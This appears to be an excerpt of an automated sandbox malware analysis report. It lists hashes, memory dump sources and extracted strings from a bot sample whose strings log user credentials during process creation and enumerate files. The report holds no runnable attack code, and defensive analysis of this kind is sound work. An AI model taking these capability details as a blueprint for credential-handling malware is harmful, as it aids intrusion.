                                                                                                                  • Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                                                                                                  • Instruction Fuzzy Hash: CEF05E23B0C20351F992BA69F4417BD12512F8E765E4A1536CD6CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                                                                                                  • Instruction ID: 769905a02f93f4641b0fa277ade33fa2edf65550ec77602944cc6a91a029ed31
                                                                                                                  • Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                                                                                                  • Instruction Fuzzy Hash: AFF05E23B0C20351F992BA69F4407BD12512F8E761E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                                                                                                  • Instruction ID: 29ae5b9a9fc11dc39a275a538e1ae2b7df3e3f448d2934274b8c77f8e487061f
                                                                                                                  • Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                                                                                                  • Instruction Fuzzy Hash: A4F05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                                                                                                  • Instruction ID: ac61f1081a1543cb7b3b3d49ec47d6bb89a66236b290778e49c4a238f751cb13
                                                                                                                  • Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                                                                                                  • Instruction Fuzzy Hash: EAF05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                                                                                                  • Instruction ID: ea937c98fd522ef77df8b19c2cd2bf04e968d66506248e9205fb5c2fad4356ef
                                                                                                                  • Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                                                                                                  • Instruction Fuzzy Hash: 7CF05E23B0C20351F992BA69F4407BD52512F8E765E4A1536CD5CCBBE3EE3DA8878210
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 419855de458aef800a4480a83e71539b6b86dfe63857b706560499ad0ef83724
                                                                                                                  • Instruction ID: 32cf6458f8114433f848d3c2157e8e340066c80160ae7a6a035e346069e858ae
                                                                                                                  • Opcode Fuzzy Hash: 419855de458aef800a4480a83e71539b6b86dfe63857b706560499ad0ef83724
                                                                                                                  • Instruction Fuzzy Hash: E8F05E23B0C20351F993BA69F4407BD12512F8E765E4A1532CD5CCBBE3EE3DA8868200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
                                                                                                                  • Instruction ID: f8712e8cac7d4c0b0a1e049d333f0a1101189842b21791314c3d0909f586558c
                                                                                                                  • Opcode Fuzzy Hash: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
                                                                                                                  • Instruction Fuzzy Hash: 45F05E23B0C20351F993BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
                                                                                                                  • Instruction ID: f8712e8cac7d4c0b0a1e049d333f0a1101189842b21791314c3d0909f586558c
                                                                                                                  • Opcode Fuzzy Hash: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
                                                                                                                  • Instruction Fuzzy Hash: 45F05E23B0C20351F993BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
                                                                                                                  • Instruction ID: f8712e8cac7d4c0b0a1e049d333f0a1101189842b21791314c3d0909f586558c
                                                                                                                  • Opcode Fuzzy Hash: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
                                                                                                                  • Instruction Fuzzy Hash: 45F05E23B0C20351F993BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                                                                                                  • Instruction ID: ac61f1081a1543cb7b3b3d49ec47d6bb89a66236b290778e49c4a238f751cb13
                                                                                                                  • Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                                                                                                  • Instruction Fuzzy Hash: EAF05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                                                                                                  • Instruction ID: ea937c98fd522ef77df8b19c2cd2bf04e968d66506248e9205fb5c2fad4356ef
                                                                                                                  • Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                                                                                                  • Instruction Fuzzy Hash: 7CF05E23B0C20351F992BA69F4407BD52512F8E765E4A1536CD5CCBBE3EE3DA8878210
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                                                                                                  • Instruction ID: 769905a02f93f4641b0fa277ade33fa2edf65550ec77602944cc6a91a029ed31
                                                                                                                  • Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                                                                                                  • Instruction Fuzzy Hash: AFF05E23B0C20351F992BA69F4407BD12512F8E761E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                                                                                                  • Instruction ID: 29ae5b9a9fc11dc39a275a538e1ae2b7df3e3f448d2934274b8c77f8e487061f
                                                                                                                  • Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                                                                                                  • Instruction Fuzzy Hash: A4F05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                                                                                                  • Instruction ID: 8a30ba5028368a2d64a71a5336cbb639696dbe2fe864b7a0b5a8a411139bc4a8
                                                                                                                  • Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                                                                                                  • Instruction Fuzzy Hash: CEF05E23B0C20351F992BA69F4417BD12512F8E765E4A1536CD6CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
                                                                                                                  • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                                                                                                                  • API String ID: 1842180197-3127737957
                                                                                                                  • Opcode ID: 94ee048e8bd45c9939ad3021e88a51864f09f1642a4dc8886498fadcceeff011
                                                                                                                  • Instruction ID: 90f0f6b1960a824e975b046659ff80df73db329f884cf8de152dc9f04693564f
                                                                                                                  • Opcode Fuzzy Hash: 94ee048e8bd45c9939ad3021e88a51864f09f1642a4dc8886498fadcceeff011
                                                                                                                  • Instruction Fuzzy Hash: 96128CA1A0C68281FE78BB11E4403B97290FB4E784F541136D95EC7AB7DF7CE6499701
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                                                                                                  • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                                                                                  • API String ID: 4253334766-1535167640
                                                                                                                  • Opcode ID: ff5049e7108b4606d8b9015f043b98a799f56cb1b49ebe0a8e8aeeddf7da304e
                                                                                                                  • Instruction ID: 63809bcc35014dcd8197d971a86ff0c1b3e9124f4a24dc64876e3a265d717c9e
                                                                                                                  • Opcode Fuzzy Hash: ff5049e7108b4606d8b9015f043b98a799f56cb1b49ebe0a8e8aeeddf7da304e
                                                                                                                  • Instruction Fuzzy Hash: 2C611B21E5C55386FB607B68E4043B86360AF0F354FA52132E96ECBAF6DE6DE9448341
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
